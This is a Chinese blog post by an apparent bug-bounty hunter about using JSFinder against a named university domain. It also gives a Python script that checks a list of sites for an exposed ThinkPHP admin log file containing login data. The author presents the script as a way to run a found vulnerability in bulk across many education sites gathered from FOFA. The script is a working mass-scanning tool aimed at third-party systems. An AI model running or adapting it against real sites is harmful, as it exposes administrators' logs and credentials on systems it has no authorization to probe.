JSFinder（改造升级版本的使用）+url批量验证脚本

题记

       明天我的服务器就要到期了，留下了贫穷的泪水。虽然没有最大化的利用，但还是给我的学习带来了不小的帮助。明天开始就要一步步完成我另一部分计划了，实操骚姿势加总结一下top10漏洞等基础知识。反思一下为啥人家一挖就是0day，我只能看着眼红。真想要同济大学的证书啊，羡慕啊。

       这几天沉迷挖洞，进个10多个后台，结果补天就给我过了一个，哎，伤不起啊。

参考链接

       真香系列-JSFinder实用改造：http://mp.weixin.qq.com/s/naf-A-E9KdK_AipZ1bznOA

       我是如何挖到edusrc年度第一的 手把手教挖洞系列 （一）：http://mp.weixin.qq.com/s?__biz=MzU1NDU1NTI5Nw==&mid=2247483753&idx=1&sn=2ae8a5c5c6042b049dfeaf605cb664c6&chksm=fbe083a7cc970ab164b25cd4e9e3d7206ea2428bb098b4356b63e9f64ea60d0c9a310245df02&mpshare=1&scene=24&srcid=0124yxK8ESPKiqEdJ94MT4h5&sharer_sharetime=1611470713604&sharer_shareid=61895cb05812503585e8ba6e6fde4aa9#rd

JSFinder.exe使用

       下载下来，cmd运行下面命令

       JSFinder.exe -u http://study.tongji.edu.cn -v -html tongji

       看着还是挺香的。

url批量验证脚本

       使用情况：当发现一个edu的0day可以把edu链接存起来批量刷。

import requests

file = open('edu.txt','r')

number = file.readlines()

for i in number:

i = i.rstrip()

i = str(i)

try:

url = 'http://' + i + "/Application/Runtime/Logs/Admin/20_12_30.log"

r = requests.get(url, timeout=1)

r.encoding = r.apparent_encoding

HtmlText = r.text

if 'login' in HtmlText:

print(url)

else:

pass

except:

pass

       edu.txt里面放可能存在漏洞的网址，不限于edu。

       以我最近奋战的一丢丢thinkphp站点举例。这里插一句，哎，穷孩子只能在fofa找5页链接，我回头一定要买个会员，fafo搜集工具用到爽，我也要站起来了。

       运行脚本发现链接。

       验证成功。

后记

       本来打算只写jsfinder的，后来觉得太少了加了一些，哈哈哈，最近挖洞挖的两眼昏花，还停不下来，有种不甘心，哎，互联网这座大山会给我们带来什么。我们不能盲目的排斥工具，工具确实给我们带来了很大的方便。社会的发展代表着生产方式的进步，网安的进步当然也离不开工具，我们要在基础保障的情况下，发展我们的工具。